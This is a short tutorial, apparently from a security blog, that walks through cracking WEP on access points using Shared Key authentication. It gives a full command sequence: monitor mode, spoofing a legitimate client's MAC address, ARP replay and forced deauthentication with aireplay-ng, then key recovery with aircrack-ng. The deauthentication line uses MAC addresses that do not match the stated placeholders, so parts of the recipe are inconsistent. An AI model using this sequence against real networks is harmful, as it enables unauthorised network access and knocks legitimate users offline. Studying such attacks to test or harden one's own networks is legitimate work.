Access Points that use WEP encryption are easy to pwn. The matter comes a little more complicated when the same APs use Shared Key as the authentication method. The instructions you find on the internet tell you that you need to deauthenticate a connected client from the AP after running airodump-ng and that with this operation you will get a .xor file containing the PGRA key to continue the attack (e.g. using the xor file to forge an ARP packet with packetforge-ng and using the interactive packet replay option of aireplay-ng). The worse thing is that this method, more often than not, does not work and the only thing you will get from airodump-ng is the message Broken SKA in the upper right corner. The reason it doesn’t work is that hardware manufacturers modify the 802.11 frame and airodump-ng doesn’t interpret it in the correct way.
How do we bypass this? One way I found is using the connected client by spoofing it’s mac address to conduct the attack. What we do is simply change our mac address to the one of the connected client and use an ARP request replay attack. To get a quick ARP packet we deauthenticate the legal client from the AP forcing it to reconnect and generate a new ARP request. In the following line you will find the commands you need to use. We are assuming that the AP is on channel 3 and that AP and client have respectively mac address AA:AA::AAAA:AA:AA: and CC:CC:CC:CC:CC:CC
- create the monitor interface on the correct channel
airmon-ng start wlan0 3
- spoof the mac address of the mon0 interface to reflect the one of the connected client
ifconfig mon0 down
macchanger –mac CC:CC:CC:CC:CC:CC mon0
ifconfig mon0 up
- run airodump to capture packets
airodump-ng –channel 3 -w SKA –bssid AA:AA:AA:AA:AA:AA mon0
- launch the arp repaly attack with aireplay-ng
aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
- deauthenticate the connected client to generate an ARP request
aireplay-ng -0 1 -a C0:C1:C0:C3:3C:41 -c d8:30:62:9e:55:92 mon0
After this the data counter in airodump-ng will start growing and it will collect ivs that you can use to crack the WEP key with aircrack-ng.
3G 802.2 802.3 Android applicativo ARP aruba avvia backtrack audio chiavetta cifrato CSMA/CD data-link datagram Desire DIX DSAP errore Ethernet facebook FCS frame Google hardening hash hosting HowTo HTC https impostazioni Indirizzo MAC IP iweb linux lm MAC modem MTU network pacchetto password sicurezza ssl TCP wifi
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.